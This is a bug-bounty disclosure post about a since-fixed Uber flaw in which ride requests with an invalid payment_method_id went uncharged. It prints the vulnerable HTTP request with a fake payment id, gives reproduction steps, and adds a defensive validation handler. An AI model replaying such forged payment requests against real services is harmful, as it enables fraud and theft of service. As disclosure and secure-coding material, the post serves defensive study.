Friday, 3 March 2017

How anyone could have used Uber to ride for free!

Note: This is being published with the permission of Uber under the responsible disclosure policy. The vulnerability was fixed in August 2016.

Summary:

This post is about an interesting bug in Uber which could have been used to ride for free anywhere in the world. Attackers could have misused it to take unlimited free rides from their Uber account.

Description:

Uber Technologies Inc. is an online transportation network company headquartered in San Francisco, California, with operations in 528 cities worldwide. Users can create their account on Uber.com and can start riding. When a ride is completed a user can either pay cash or charge it to their credit/debit card.
But by specifying an invalid payment method (for example abc, xyz, etc.), I could ride Uber for free.

To demonstrate the bug, I took permission from the Uber team and took free rides in the United States and India, and I wasn't charged on any of my payment methods.

Vulnerable request:

POST /api/dial/v2/requests HTTP/1.1
Host: dial.uber.com

{"start_latitude":12.925151699999999,"start_longitude":77.6657536,"product_id":"db6779d6-d8da-479f-8ac7-8068f4dade6f","payment_method_id":"xyz"}

Steps to reproduce:

1) Replayed the above request with random characters as payment_method_id.

2) The ride was free.
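As an added defender-side illustration (example code written for this write-up, not Uber's code and not part of the original post), here is a hypothetical request handler that checks payment_method_id against the methods registered to the requesting account before a ride is dispatched. The product id is the one from the captured request; the account ids, payment-method ids and error strings are constructed.

```python
"""Server-side validation of a ride request's payment_method_id.
Hypothetical handler for this write-up, not Uber's code; the store layout,
account ids and error strings are assumptions."""
from dataclasses import dataclass
import uuid

# Constructed sample data: account -> payment-method ids it has registered.
REGISTERED_PAYMENT_METHODS = {
    "rider-1": {"pm_4f1c2e", "cash"},
}
# Product id taken from the captured request above.
KNOWN_PRODUCTS = {"db6779d6-d8da-479f-8ac7-8068f4dade6f"}

@dataclass
class RideRequest:
    request_id: str
    rider: str
    product_id: str
    payment_method_id: str

class InvalidRideRequest(ValueError):
    """Raised when the request body fails validation; nothing is dispatched."""

def create_ride_request(rider: str, payload: dict) -> RideRequest:
    """Validate the body before creating a ride. The key check is that
    payment_method_id belongs to this rider: a made-up id like "xyz"
    is rejected up front instead of producing a ride with nothing to charge."""
    for key in ("start_latitude", "start_longitude", "product_id", "payment_method_id"):
        if key not in payload:
            raise InvalidRideRequest(f"missing field: {key}")
    lat, lon = payload["start_latitude"], payload["start_longitude"]
    if not all(isinstance(v, (int, float)) for v in (lat, lon)):
        raise InvalidRideRequest("coordinates must be numeric")
    if not (-90 <= lat <= 90 and -180 <= lon <= 180):
        raise InvalidRideRequest("coordinates out of range")
    if payload["product_id"] not in KNOWN_PRODUCTS:
        raise InvalidRideRequest("unknown product_id")
    pm = payload["payment_method_id"]
    # Ownership check: the id must be registered to *this* account, not merely well-formed.
    if pm not in REGISTERED_PAYMENT_METHODS.get(rider, set()):
        raise InvalidRideRequest("payment_method_id is not registered to this account")
    return RideRequest(str(uuid.uuid4()), rider, payload["product_id"], pm)

def accepts(rider: str, payload: dict) -> bool:
    """True when the request would be dispatched, False when validation rejects it."""
    try:
        create_ride_request(rider, payload)
        return True
    except InvalidRideRequest:
        return False
```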

Video Proof of concept:

Thanks to the Uber team for fixing this quickly.